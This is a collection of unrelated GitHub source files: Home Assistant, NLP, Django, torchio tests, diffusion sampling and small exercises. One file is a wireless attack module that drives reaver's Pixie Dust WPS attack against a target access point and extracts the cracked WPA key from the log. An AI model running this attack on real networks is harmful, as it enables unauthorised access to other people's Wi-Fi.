data from.\n\n Returns:\n dict: The data from the coordinator or an empty dictionary if None.\n \"\"\"\n return coordinator.data or {}\n\n async def refresh_data(self, config_entry: ConfigEntry) -> None:\n \"\"\"Refresh KNMI data for a specific config entry.\n\n Args:\n config_entry (ConfigEntry): The config entry to refresh data for.\n \"\"\"\n coordinator = self._get_coordinator(config_entry)\n if coordinator:\n await coordinator.async_request_refresh()\n\n async def refresh_all_data(self) -> None:\n \"\"\"Refresh KNMI data for all config entries.\"\"\"\n await asyncio.gather(\n *[self.refresh_data(config_entry) for config_entry in self.hass.config_entries.async_entries(DOMAIN)]\n )\n\n async def async_on_remove(self) -> None:\n \"\"\"Remove config entries when the integration is uninstalled.\"\"\"\n async for config_entry in self.hass.config_entries.async_entries(DOMAIN):\n await self.hass.config_entries.async_remove(config_entry.entry_id)","repo_name":"HiDiHo01/ha-knmi","sub_path":"custom_components/knmi/diagnostics.py","file_name":"diagnostics.py","file_ext":"py","file_size_in_byte":3550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"44"} +{"seq_id":"19359113276","text":"#!/usr/bin/python3\n#-*- coding: utf-8 -*-\n\n\nimport os\nimport re\nimport copy\nimport jieba\nimport codecs\nimport jieba.analyse\nimport jieba.posseg as pseg\nfrom gensim import corpora\nfrom gensim import models\nfrom utils.global_names import GlobalNames, get_file_path \n\n\ndef _load_words(file_name):\n file_path = get_file_path(file_name)\n with codecs.open(file_path, \"r\", \"utf-8\") as rfd:\n words_set = set(rfd.read().splitlines())\n return words_set\n\n\nclass NlpUtil(object):\n\n punctuations_set = _load_words(GlobalNames.PUNCTUATIONS_FILE)\n stopwords_set = _load_words(GlobalNames.STOPWORDS_FILE)\n user_define_words = _load_words(GlobalNames.USER_DEFINE_WORDS)\n remove_words_set = _load_words(GlobalNames.REMOVE_WORDS_FILE)\n \n # Init jieba\n 
jieba.initialize()\n for w in user_define_words:\n jieba.add_word(w, freq=1000000)\n\n corpus_dict = None\n tfidf_model = None\n\n url_pattern = re.compile(r\"(https|http)://.+?html\")\n digit_pattern = re.compile(r\"\\d+\")\n bracket_pattern = re.compile(r\"\\[.+?\\]\")\n\n not_place_set = set([\"京东\", \"上门\", \"东西\", \"拜拜\", \"满意度\",\n \"新旧\", \"入口\", \"莫大\", \"蓝牙\", \"英伦\", \"顺顺利利\",\n \"哥哥\", \"立马\", \"海鲜\", \"回邮\", \"太多\", \"长北\", \"南那\",\n \"白跑\", \"天黑\", \"天阿\", \"美华\", \"华联\", \"日及\", \"山山\",\n \"京福顺\", \"卡拿\", \"太卡\", \"太大\", \"千古\", \"英哥\", \"两棵树\",\n \"太累\", \"包邮\", \"加半\", \"中华人名共和国\", \"六便士\", \"串联\",\n \"非顺丰\", \"中考\", \"北冰洋\", \"下嫩\", \"安安\", \"太鲜\", \"上拉\",\n \"入店\", \"上下水\", \"图京\", \"之城\", \"中断\", \"中武\", \"伦理\", \n \"中道\", \"之康\", \"多维度\", \"黑边\", \"中爱\", \"之泰\", \"锦园店\", \n \"三国\", \"阿门\", \"肯本\", \"刚京麦\", \"大黑\", \"朝霞\", \"关门大吉\", \n \"哥别\", \"沧桑\", \"下山\", \"日京京\", \"沙沙\", \"牙牙\", \"顿顿\", \"山高\",\n \"钱和京\", \"非买\", \"上旧\", \"四科\", \"西东\", \"上岗\", \"大山\", \n \"福尔马林\", \"滑黑\", \"上东\", \"中上\", \"内马尔\", \"中同\", \"中达\",\n \"下欧\", \"四门\", \"深春\", \"正东\", \"江南春\", \"入维\", \"大班\", \n \"中联\", \"猫沙\", \"长卡\", \"几环\", \"尾塞\", \"小桥流水\", \"澳邮\", \n \"上中\", \"英雄\", \"镇镇\", \"如东\", \"上口\", \"加邮\", \"八国\", \n \"福利\", \"台基\", \"那本\", \"中邮\", \"六本\", \"维沙\", \"中黑\", \n \"上美\", \"加花\", \"天哇\", \"远超过\", \"大拿\", \"贵干\", \"苏中\",\n \"三本\", \"酒塞\", \"七本\", \"美院\", \"中通\", \"美人壶加\", \"中充\",\n \"下国\", \"京伦\", \"九联\", \"上马\", \"美化\", \"江湖\", \"黑店\", \n \"几米远\", \"午安\", \"七哥\", \"角美\", \"日春\", \"几比\", \"确保安全\",\n \"壶水\", \"荷塘月色\", \"云集\", \"拉边\", \"欧克\", \"中右\", \"加的京\", \n \"上路\", \"烟嘴\", \"临证指南\", \"串口卡\", \"新建\", \"安利\", \"山泉水\",\n \"苏泊尔\", \"墨黑\", \"胶盆\", \"长达\", \"商城\"])\n\n\n @classmethod\n def place_recognize(cls, text):\n places = [w for w, flag in pseg.cut(text) if \"ns\" in flag \n and len(w) >= 2 \n and w not in cls.not_place_set \n and \"哈\" not in w\n and \"之\" not in w \n and \"本\" not in w\n and \"中\" not in w\n and \"嫩\" not in w\n and \"大\" not in w\n 
and \"鲜\" not in w\n and \"国\" not in w\n and \"上\" not in w\n and \"确\" not in w\n and \"牙\" not in w\n and \"壶\" not in w\n and \"阿\" not in w\n and \"入\" not in w\n and \"哥\" not in w\n and \"颗\" not in w\n and \"的\" not in w\n and \"联\" not in w\n and \"哇\" not in w]\n\n return places\n\n\n @classmethod\n def tokenize(cls,\n text,\n filter_punctuations=False,\n filter_stopwords=False,\n filter_alpha=False,\n remove_words=False,\n normalize_url=False,\n recognize_place=False,\n minimum_tokens_num=1): \n '''Tokenize text'''\n try:\n places = cls.place_recognize(text)\n for w in places:\n text = text.replace(w, \"[地址x]\")\n text = cls.digit_pattern.sub(\"[数字x]\", text)\n if normalize_url:\n text = cls.url_pattern.sub(\"URL\", text)\n tokens = jieba.lcut(text)\n text = \" \".join(tokens)\n for s in cls.bracket_pattern.findall(text):\n text = text.replace(s, s.replace(\" \", \"\"))\n text = text.replace(u\"# E - s [数字x]\", u\"#E-s[数字x]\")\n text = text.replace(u\"# E - s DIGIT [数字x]\", u\"#E-s[数字x]\")\n text = text.replace(u\"< s >\", \"\")\n tokens = text.split()\n tokens_copy = copy.copy(tokens)\n\n # Filter words.\n if filter_punctuations:\n tokens = [w for w in tokens if w not in cls.punctuations_set]\n if filter_stopwords:\n tokens = [w for w in tokens if w not in cls.stopwords_set]\n if filter_alpha:\n tokens = [w for w in tokens if not w.encode(\"utf-8\").isalpha()\n or w in set([\"URL\"])]\n if remove_words:\n tokens = [w for w in tokens if w not in cls.remove_words_set]\n\n if len(tokens) < minimum_tokens_num:\n tokens = tokens_copy\n\n new_tokens = tokens[:1]\n t_len = len(tokens)\n for i in range(1, t_len):\n if tokens[i] != tokens[i - 1]:\n new_tokens.append(tokens[i])\n return new_tokens\n except Exception as e:\n print (\"text=%s, errmsg=%s\" % (text, e))\n return [text]\n\n\n @classmethod\n def get_tfidf(cls, words):\n if cls.tfidf_model is None:\n corpus_dict_path = get_file_path(GlobalNames.CORPUS_DICT_FILE)\n cls.corpus_dict = 
corpora.Dictionary.load(corpus_dict_path)\n corpus_tfidf_path = get_file_path(GlobalNames.CORPUS_TFIDF_FILE)\n cls.tfidf_model = models.tfidfmodel.TfidfModel.load(corpus_tfidf_path)\n bow = cls.corpus_dict.doc2bow(words)\n tfidf = cls.tfidf_model[bow]\n tfidf = [(cls.corpus_dict[x[0]], x[1]) for x in tfidf]\n tfidf.sort(key=lambda x: x[1], reverse=True)\n return tfidf\n \n\n @classmethod\n def get_keywords(cls, text, size=3, way=None):\n if way == None or way == \"tfidf\":\n tokens = cls.tokenize(text)\n tfidf = cls.get_tfidf(tokens)\n ret_tokens = [x[0] for x in tfidf[:size]]\n return ret_tokens\n elif way == \"textrank\":\n return jieba.analyse.textrank(text, topK=size)\n","repo_name":"Dikea/Dialog-System-with-Task-Retrieval-and-Seq2seq","sub_path":"utils/nlp_util.py","file_name":"nlp_util.py","file_ext":"py","file_size_in_byte":6886,"program_lang":"python","lang":"en","doc_type":"code","stars":409,"dataset":"github-code","pt":"44"} +{"seq_id":"36715041610","text":"__PRIORITY__ = 0\n\nimport os\nimport re\nimport pexpect\nimport subprocess\nimport src.settings as settings\n\nfrom poormanslogging import info, warn, error\nfrom src.attacks.base_attack import BaseAttack\nimport src.utils.report as report\n\nclass wps_pixiedust(BaseAttack):\n\tdef __init__(self, p):\n\t\tpass\n\n\tdef run(self):\n\t\tinfo(\"Running Pixie Dust attack...\")\n\t\treport.saveLog(\"Running Pixie Dust attack...\")\n\t\tcmd_reaver = pexpect.spawn(\n\t\t\t'reaver -i {0} -c {1} -b {2} -vv -K 1'.format(settings.INTERFACE_MON, settings.TARGET_CHANNEL, settings.TARGET_BSSID))\n\t\tcmd_reaver.logfile = open(settings.LOG_FILE, 'wb')\n\t\tcmd_reaver.expect(['WPA PSK:','WPS pin not found!', pexpect.TIMEOUT, pexpect.EOF], 30)\n\t\tcmd_reaver.close()\n\n\t\tparse_log_crack = open(settings.LOG_FILE, 'r')\n\t\tfor line in parse_log_crack:\n\t\t\tif 'WPA PSK:' in line:\n\t\t\t\tkey_reg = re.split(\"('.*?')|(\\\".*?\\\")\", line)\n\t\t\t\tkey_filter = 
key_reg[1].replace(\"'\",\"\")\n\t\t\t\tsettings.TARGET_KEY = key_filter\n\t\t\t\tbreak\n\t\tparse_log_crack.close()\n\t\tos.remove(settings.LOG_FILE)\n\t\tif settings.TARGET_KEY is None:\n\t\t\twarn(\"Pixie Dust attack failed!\")\n\t\t\treport.saveLog(\"Pixie Dust attack failed!\")\n\t\n\tdef setup(self):\n\t\tpass\n\n\tdef check(self):\n\t\tdeps = [\"reaver\",\"pixiewps\"]\n\t\tfor d in deps:\n\t\t\tif subprocess.call([\"which\", d],stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) != 0:\n\t\t\t\terror(\"Required binary for {bin} not found.\".format(bin=d))\n\t\t\t\treport.saveLog(\"Required binary for {bin} not found.\".format(bin=d))\n\t\t\t\treturn False\n\t\treturn True\n","repo_name":"larry852/ppdron","sub_path":"src/attacks/wps_pixiedust_attack.py","file_name":"wps_pixiedust_attack.py","file_ext":"py","file_size_in_byte":1496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"37670887378","text":"from django import forms\nfrom django.forms.models import inlineformset_factory\n\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Layout, Fieldset, Div, Row, Column, Hidden, ButtonHolder, Submit\n\nfrom forms.custom_layout_object import Formset\nfrom forms.fields import ModelChoiceFieldWithCreate\nfrom forms.models.expense_desc import ExpenseDesc, ExpenseDescLine\n\n\nclass ExpenseDescLineForm(forms.ModelForm):\n class Meta:\n model = ExpenseDescLine\n exclude = ()\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_show_labels = False\n for _, field in self.fields.items():\n if field.widget.input_type == 'select':\n field.widget.attrs.update({'class': 'select_class'})\n else:\n field.widget.attrs['class'] = 'form-control'\n\n\nExpenseDescFormSet = inlineformset_factory(\n ExpenseDesc, ExpenseDescLine, form=ExpenseDescLineForm,\n fields=['gross_internal_income', 'official_expense',\n 
'financial_support_expense', 'future_expense', 'capital_expenditure', 'expense_desc'],\n extra=1,\n can_delete=True\n)\n\n\nclass ExpenseDescForm(forms.ModelForm):\n\n class Meta:\n model = ExpenseDesc\n fields = '__all__'\n exclude = ('create_user', )\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_id = 'form_to_submit'\n self.helper.form_tag = True\n self.helper.layout = Layout(\n Hidden('next_state', 'next'),\n Row(\n css_class='form-row'\n ),\n Div(\n Fieldset('',\n Formset('lines')\n ),\n\n )\n )\n","repo_name":"Rabin5/formcollection","sub_path":"forms/forms/expense_desc.py","file_name":"expense_desc.py","file_ext":"py","file_size_in_byte":1849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"73246285892","text":"'''\n@author: Dascalu Cosmin-Andrei\n'''\n\nfrom erori.exceptii import ValidError , RepoError\nfrom utils.dictionare import character_to_decimal\n\nclass Validator(object):\n \n def __init__(self):\n '''\n Functie de tip constructor care construieste un obiect de tip Validator\n Input: - \n Output: -\n '''\n pass \n\n def valideaza_operatie(self, numarA, numarB, operatie):\n '''\n Functie care valideaza operatiile ce pot fi efectuate intre cele 2 numere\n Input: numarA, numarB - entitati de tip Numar\n operatie - un caracter \n Output: - \n Raises: Exception\n if operations is '/' and the second number is 0 -> \"Divide by 0!\\n\"\n if operation is '-' and the second number is bigger than the first number -> \"Scadere negativa!\\n\"\n '''\n erori = ''\n if operatie == '/': \n if numarB.get_valoare() == '0': \n erori += \"Divide by 0!\\n\"\n elif operatie == '-': \n if len(numarA.get_valoare()) < len(numarB.get_valoare()):\n erori += \"Scadere negativa!\\n\"\n elif len(numarA.get_valoare()) == len(numarB.get_valoare()):\n # Verific daca de la stanga la dreapta numarulA are o cifra mai mica decat numarulB.\n 
scadereNegativa = False \n index = 0 \n while index < len(numarA.get_valoare()) and scadereNegativa == False: \n if numarA.get_valoare()[index] < numarB.get_valoare()[index]: \n scadereNegativa = True \n index = index + 1 \n if scadereNegativa == True: \n erori += \"Scadere negativa!\\n\"\n if len(erori) > 0: # Exista erori \n raise RepoError(erori)\n\n def valideaza_operatie_input(self, operatie):\n '''\n Functie care valideaza operatia aritmetica de baza\n Input: operatie - un string \n Output: - \n Raises: Exception \n daca operatia este diferita de '+-*/' -> \"Operatie aritmetica nevalida!\\n\"\n '''\n if len(operatie) != 1 or operatie not in '+-*/': \n raise ValidError(\"Operatie aritmetica nevalida!\\n\")\n\n def valideaza_baza(self, baza):\n '''\n Functie care valideaza baza de numeratie a unui numar\n Input: baza - un numar intreg \n Output: - \n Raises: Exception\n daca baza nu apartine multimii {2,3, 4, ..., 10, 16} -> \"Baza de numeratie nevalida!\\n\"\n '''\n if baza not in ['2', '3', '4', '5', '6', '7', '8', '9', '10', '16']:\n raise ValidError(\"Baza de numeratie nevalida!\")\n\n def valideaza_numar(self, valoare_numar, baza):\n '''\n Functie care valideaza daca un numar are toate cifrele intr-o baza de numeratie\n Input: valoare_numar - un string\n baza - un string, pentru care valoarea sa apartine {2, 3, ..., 10, 16}\n Output: - \n Raises: Exception\n daca numarul contine o cifra care nu este in baza transmisa ca parametru -> \"Numar nevalid!\"\n '''\n # Verificam daca toate cifrele sunt cel putin in bazele admise (2, 3, ..., 10, 16)\n for digit in valoare_numar:\n if digit not in character_to_decimal:\n raise ValidError(\"Numar nevalid!\")\n # Verificam toate toate cifrele sunt mai mici decat baza data\n for digit in valoare_numar: \n digit_integer = character_to_decimal[digit]\n baza_integer = int(baza)\n if digit_integer >= baza_integer: \n raise ValidError(\"Numar 
nevalid!\")\n","repo_name":"DascaluCosmin/BaseConverter","sub_path":"Conversii/ConversionOperations/valid/validatoare.py","file_name":"validatoare.py","file_ext":"py","file_size_in_byte":3640,"program_lang":"python","lang":"ro","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"22729470858","text":"import tempfile\nfrom pathlib import Path\n\nimport numpy as np\nimport pytest\nimport SimpleITK as sitk\nimport torch\nfrom torchio.data import io\nfrom torchio.data import ScalarImage\n\nfrom ..utils import TorchioTestCase\n\n\nclass TestIO(TorchioTestCase):\n \"\"\"Tests for `io` module.\"\"\"\n\n def setUp(self):\n super().setUp()\n self.nii_path = self.get_image_path('read_image')\n self.dicom_dir = self.get_tests_data_dir() / 'dicom'\n self.dicom_path = self.dicom_dir / 'IMG0001.dcm'\n string = (\n '1.5 0.18088 -0.124887 0.65072 '\n '-0.20025 0.965639 -0.165653 -11.6452 '\n '0.0906326 0.18661 0.978245 11.4002 '\n '0 0 0 1 '\n )\n tensor = torch.as_tensor(np.fromstring(string, sep=' ').reshape(4, 4))\n self.matrix = tensor\n\n def test_read_image(self):\n # I need to find something readable by nib but not sitk\n io.read_image(self.nii_path)\n\n def test_save_rgb(self):\n im = ScalarImage(tensor=torch.rand(1, 4, 5, 1))\n with pytest.warns(RuntimeWarning):\n im.save(self.dir / 'test.jpg')\n\n def test_read_dicom_file(self):\n tensor, _ = io.read_image(self.dicom_path)\n assert tuple(tensor.shape) == (1, 88, 128, 1)\n\n def test_read_dicom_dir(self):\n tensor, _ = io.read_image(self.dicom_dir)\n assert tuple(tensor.shape) == (1, 88, 128, 17)\n\n def test_dicom_dir_missing(self):\n with pytest.raises(FileNotFoundError):\n io._read_dicom('missing')\n\n def test_dicom_dir_no_files(self):\n empty = self.dir / 'empty'\n empty.mkdir()\n with pytest.raises(FileNotFoundError):\n io._read_dicom(empty)\n\n def write_read_matrix(self, suffix):\n out_path = self.dir / f'matrix{suffix}'\n io.write_matrix(self.matrix, out_path)\n matrix = 
io.read_matrix(out_path)\n assert torch.allclose(matrix, self.matrix)\n\n def test_matrix_itk(self):\n self.write_read_matrix('.tfm')\n self.write_read_matrix('.h5')\n\n def test_matrix_txt(self):\n self.write_read_matrix('.txt')\n\n def test_ensure_4d_5d(self):\n tensor = torch.rand(3, 4, 5, 1, 2)\n assert io.ensure_4d(tensor).shape == (2, 3, 4, 5)\n\n def test_ensure_4d_5d_t_gt_1(self):\n tensor = torch.rand(3, 4, 5, 2, 2)\n with pytest.raises(ValueError):\n io.ensure_4d(tensor)\n\n def test_ensure_4d_2d(self):\n tensor = torch.rand(4, 5)\n assert io.ensure_4d(tensor).shape == (1, 4, 5, 1)\n\n def test_ensure_4d_2d_3dims_rgb_first(self):\n tensor = torch.rand(3, 4, 5)\n assert io.ensure_4d(tensor).shape == (3, 4, 5, 1)\n\n def test_ensure_4d_2d_3dims_rgb_last(self):\n tensor = torch.rand(4, 5, 3)\n assert io.ensure_4d(tensor).shape == (3, 4, 5, 1)\n\n def test_ensure_4d_3d(self):\n tensor = torch.rand(4, 5, 6)\n assert io.ensure_4d(tensor).shape == (1, 4, 5, 6)\n\n def test_ensure_4d_2_spatial_dims(self):\n tensor = torch.rand(4, 5, 6)\n assert io.ensure_4d(tensor, num_spatial_dims=2).shape == (4, 5, 6, 1)\n\n def test_ensure_4d_3_spatial_dims(self):\n tensor = torch.rand(4, 5, 6)\n assert io.ensure_4d(tensor, num_spatial_dims=3).shape == (1, 4, 5, 6)\n\n def test_ensure_4d_nd_not_supported(self):\n tensor = torch.rand(1, 2, 3, 4, 5)\n with pytest.raises(ValueError):\n io.ensure_4d(tensor)\n\n def test_sitk_to_nib(self):\n data = np.random.rand(10, 12)\n image = sitk.GetImageFromArray(data)\n tensor, _ = io.sitk_to_nib(image)\n assert data.sum() == pytest.approx(tensor.sum())\n\n def test_sitk_to_affine(self):\n spacing = 1, 2, 3\n direction_lps = -1, 0, 0, 0, -1, 0, 0, 0, 1\n origin_lps = l, p, s = -10, -20, 30\n image = sitk.GetImageFromArray(np.random.rand(10, 20, 30))\n image.SetDirection(direction_lps)\n image.SetSpacing(spacing)\n image.SetOrigin(origin_lps)\n origin_ras = -l, -p, s\n fixture = np.diag((*spacing, 1))\n fixture[:3, 3] = origin_ras\n affine = 
io.get_ras_affine_from_sitk(image)\n self.assert_tensor_almost_equal(fixture, affine)\n\n\n# This doesn't work as a method of the class\nlibs = 'sitk', 'nibabel'\nparameters = []\nfor save_lib in libs:\n for load_lib in libs:\n for dims in 2, 3, 4:\n parameters.append((save_lib, load_lib, dims))\n\n\n@pytest.mark.parametrize(('save_lib', 'load_lib', 'dims'), parameters)\ndef test_write_nd_with_a_read_it_with_b(save_lib, load_lib, dims):\n shape = [1, 4, 5, 6]\n if dims == 2:\n shape[-1] = 1\n elif dims == 4:\n shape[0] = 2\n tensor = torch.randn(*shape)\n affine = np.eye(4)\n tempdir = Path(tempfile.gettempdir()) / '.torchio_tests'\n tempdir.mkdir(exist_ok=True)\n path = tempdir / 'test_io.nii'\n save_function = getattr(io, f'_write_{save_lib}')\n load_function = getattr(io, f'_read_{save_lib}')\n save_function(tensor, affine, path)\n loaded_tensor, loaded_affine = load_function(path)\n TorchioTestCase.assert_tensor_equal(\n tensor.squeeze(),\n loaded_tensor.squeeze(),\n msg=f'Save lib: {save_lib}; load lib: {load_lib}; dims: {dims}',\n )\n TorchioTestCase.assert_tensor_equal(affine, loaded_affine)\n\n\nclass TestNibabelToSimpleITK(TorchioTestCase):\n def setUp(self):\n super().setUp()\n self.affine = np.eye(4)\n\n def test_wrong_num_dims(self):\n with pytest.raises(ValueError):\n io.nib_to_sitk(np.random.rand(10, 10), self.affine)\n\n def test_2d_single(self):\n data = np.random.rand(1, 10, 12, 1)\n image = io.nib_to_sitk(data, self.affine)\n assert image.GetDimension() == 2\n assert image.GetSize() == (10, 12)\n assert image.GetNumberOfComponentsPerPixel() == 1\n\n def test_2d_multi(self):\n data = np.random.rand(5, 10, 12, 1)\n image = io.nib_to_sitk(data, self.affine)\n assert image.GetDimension() == 2\n assert image.GetSize() == (10, 12)\n assert image.GetNumberOfComponentsPerPixel() == 5\n\n def test_2d_3d_single(self):\n data = np.random.rand(1, 10, 12, 1)\n image = io.nib_to_sitk(data, self.affine, force_3d=True)\n assert image.GetDimension() == 3\n assert 
image.GetSize() == (10, 12, 1)\n assert image.GetNumberOfComponentsPerPixel() == 1\n\n def test_2d_3d_multi(self):\n data = np.random.rand(5, 10, 12, 1)\n image = io.nib_to_sitk(data, self.affine, force_3d=True)\n assert image.GetDimension() == 3\n assert image.GetSize() == (10, 12, 1)\n assert image.GetNumberOfComponentsPerPixel() == 5\n\n def test_3d_single(self):\n data = np.random.rand(1, 8, 10, 12)\n image = io.nib_to_sitk(data, self.affine)\n assert image.GetDimension() == 3\n assert image.GetSize() == (8, 10, 12)\n assert image.GetNumberOfComponentsPerPixel() == 1\n\n def test_3d_multi(self):\n data = np.random.rand(5, 8, 10, 12)\n image = io.nib_to_sitk(data, self.affine)\n assert image.GetDimension() == 3\n assert image.GetSize() == (8, 10, 12)\n assert image.GetNumberOfComponentsPerPixel() == 5\n","repo_name":"fepegar/torchio","sub_path":"tests/data/test_io.py","file_name":"test_io.py","file_ext":"py","file_size_in_byte":7212,"program_lang":"python","lang":"en","doc_type":"code","stars":1864,"dataset":"github-code","pt":"44"} +{"seq_id":"33978031254","text":"# lets define a class bike\nclass Bike:\n def __init__ (self, colour, frame_material):\n self.colour = colour\n self.frame_material = frame_material\n\n def brake(self):\n print(\"Breaking\")\n\n\n# lets create a couple of instances\nred_bike = Bike('Red','carbon fiber')\nblue_bike = Bike('Blue','steel')\n\n# lets inspect the object\nprint(red_bike.colour)\nprint(red_bike.frame_material)\nprint(blue_bike.colour)\nprint(blue_bike.frame_material)\n\n# lets brake\nred_bike.brake()\n\n","repo_name":"vlvanchin/learn","sub_path":"learn_python/bin/bike.py","file_name":"bike.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"37041863159","text":"from codebase_craft.dynamic_codebase_templating import template_manager\r\nfrom codebase_craft.codebase_setup.directory_setup import (\r\n create_directory,\r\n 
setup_directory,\r\n)\r\n\r\nfrom codebase_craft.utils.handlers import (\r\n log_info,\r\n print_success,\r\n start_progress_task,\r\n update_progress,\r\n)\r\n\r\n\r\ndef setup_command(logger, console, project_name, template):\r\n log_info(f\"Loading template: {template}\")\r\n template = template_manager.load_template(logger, template)\r\n\r\n task_id = start_progress_task(100, f\"Setting up the {project_name} directory\")\r\n log_info(f\"Creating the project codebase directory for {project_name}\")\r\n create_directory(project_name, logger)\r\n update_progress(task_id, 50)\r\n\r\n log_info(f\"Setting up the {project_name}/ directory\")\r\n setup_directory(template, project_name, logger)\r\n update_progress(task_id, 50)\r\n\r\n print_success(\"Setup complete.\")\r\n","repo_name":"cybrvybe/codebase-craft","sub_path":"x1dra.ai/cli/commands/setup_commands.py","file_name":"setup_commands.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"22050891286","text":"source_url = \"https://blog.ishandeveloper.com/foobar-2020\"\n\n\n# Mod:\n# - cast output from pow() to int\n\ndef dTob(d, b):\n digits = []\n while d > 0:\n digits.insert(0, str(d % b))\n d = d / b\n return ''.join(digits)\n\ndef bTod(b, c):\n n = 0\n for d in str(b):\n n = c * n + int(d)\n return n\n\ndef negative(x, y, b):\n if b==10:\n return int(x) - int(y)\n\n dx=bTod(x,b)\n dy=bTod(y,b)\n dz=dx-dy\n return dTob(dz, b)\n\ndef solution(n, b):\n arr=[]\n while True:\n i = \"\".join(sorted(str(n), reverse=True))\n j = \"\".join(sorted(str(n)))\n k = negative(i,j,b)\n\n k2 = len(str(k))\n i2 = len(str(i))\n\n if (k2) != i2:\n k = k * int(pow(10 ,(i2-k2)))\n\n for index, item in enumerate(arr):\n if item == k:\n return index + 1\n arr = [k] + arr\n n = 
k\n","repo_name":"1969-07-20/GoogleFoobarChallenge","sub_path":"OfflineTester/Level2_HeyIAlreadyDidThat/solution2.py","file_name":"solution2.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"27530491311","text":"import abc\nimport torch\n\nfrom core.models.model_utils import couple, decouple, get_colourisation_mask\n\n\nclass Corrector(abc.ABC):\n def __init__(self, sde, snr, n_steps):\n super().__init__()\n self.sde = sde\n self.snr = snr\n self.n_steps = n_steps\n\n @abc.abstractmethod\n def update_fn(self, network, x, t):\n pass\n\n def inpainting_update_fn(self, network, data, mask, x, t):\n with torch.no_grad():\n vec_t = torch.ones(data.shape[0], device=data.device) * t\n x, x_mean = self.update_fn(network, x, vec_t)\n masked_data_mean, std = self.sde.marginal_prob(data, vec_t)\n masked_data = (\n masked_data_mean + torch.randn_like(x) * std[:, None, None, None]\n )\n x = x * (mask) + masked_data * (1.0 - mask)\n x_mean = x * (mask) + masked_data_mean * (1.0 - mask)\n return x, x_mean\n\n def colorization_update_fn(self, network, gray_scale_img, x, t):\n with torch.no_grad():\n mask = get_colourisation_mask(x)\n vec_t = torch.ones(x.shape[0], device=x.device) * t\n x, x_mean = self.update_fn(network, x, vec_t)\n masked_data_mean, std = self.sde.marginal_prob(\n decouple(gray_scale_img), vec_t\n )\n masked_data = (\n masked_data_mean + torch.randn_like(x) * std[:, None, None, None]\n )\n x = couple(decouple(x) * (1.0 - mask) + masked_data * mask)\n x_mean = couple(decouple(x) * (1.0 - mask) + masked_data_mean * mask)\n return x, x_mean\n\n\nclass NoneCorrector(Corrector):\n def __init__(self, sde, snr, n_steps):\n super().__init__(sde, snr, n_steps)\n\n def update_fn(self, network, x, t):\n return x, 
x\n","repo_name":"satnavpt/DDPMs-Inpainting","sub_path":"diffusion/core/models/sdes/correctors/corrector.py","file_name":"corrector.py","file_ext":"py","file_size_in_byte":1802,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"31442036535","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n\nfrom __future__ import division\n\nimport math as maths\nimport os\n\nfrom pypyx.pypyx import colour, pic, pypyx_maths\n\np = pic (scale = 4.0)\n\no = (0, 0)\nd = maths.sqrt(3) / 2\n\n### o'clock positions\nd2 = (d, .5)\nd4 = (d, -.5)\nd6 = (0, -1)\nd8 = (-d, -.5)\nd10 = (-d, .5)\nd12 = (0, 1)\n\np.op().stroked(colour.grey()).line ((-d/2, .25), (d/2, .75))\np.op().stroked(colour.grey()).line ((d/2, .25), (-d/2, .75))\n\nmj = d / maths.sqrt(2)\nmn = mj / maths.sqrt(3)\n\np.op().dashed().stroked(\"red\").ellipse((d/2, -.25), mj, mn, pypyx_maths.degrees(60))\np.op().dashed().stroked(\"green\").ellipse((0, .5), mj, mn, pypyx_maths.degrees(0))\np.op().dashed().stroked(\"blue\").ellipse((-d/2, -.25), mj, mn, pypyx_maths.degrees(-60))\n\np.op().stroked(\"red\").ellipse((d/2, -.25), mj/2, mn/2, pypyx_maths.degrees(60))\np.op().stroked(\"green\").ellipse((0, .5), mj/2, mn/2, pypyx_maths.degrees(0))\np.op().stroked(\"blue\").ellipse((-d/2, -.25), mj/2, mn/2, pypyx_maths.degrees(-60))\n\np.op().line (o, d2)\np.op().line (o, d10)\np.op().line (o, d6)\n\np.op().line (d2, d12)\np.op().line (d2, d4)\np.op().line (d6, d4)\np.op().line (d6, d8)\np.op().line (d10, d12)\np.op().line (d10, d8)\n\np.output_pdf (os.path.splitext(__file__)[0])\n","repo_name":"Rhubbarb/PyPyX","sub_path":"example/ellipse_cube.py","file_name":"ellipse_cube.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"11063045767","text":"'''\nWrite a program that will compute the area of a circle.\nPrompt the user to enter the radius and\nprint a nice message 
back to the user with the answer.\n'''\n\n\nimport math\nr=float(input(\"please enter the radius:\"))\nareaCircle = math.pi*r**2\nprint(areaCircle)\n\n\n","repo_name":"wang0759/pythonLab3","sub_path":"areaCircle.py","file_name":"areaCircle.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"74355821894","text":"import json\nimport os\nimport time\nfrom urllib.request import urlopen, Request\n\nurl = \"https://ws.clarin-pl.eu/nlprest2/base\"\n\n\ndef upload(text):\n file_id = urlopen(Request(url + '/upload/',\n text.encode('utf-8'),\n {'Content-Type': 'binary/octet-stream'})).read().decode()\n return file_id\n\n\ndef start_task(doc):\n json_doc = json.dumps(doc).encode('utf-8')\n\n task_id = urlopen(Request(url + '/startTask/',\n json_doc,\n {'Content-Type': 'application/json'})).read().decode()\n\n time.sleep(0.2)\n\n resp = urlopen(Request(url + '/getStatus/' + task_id))\n\n data = 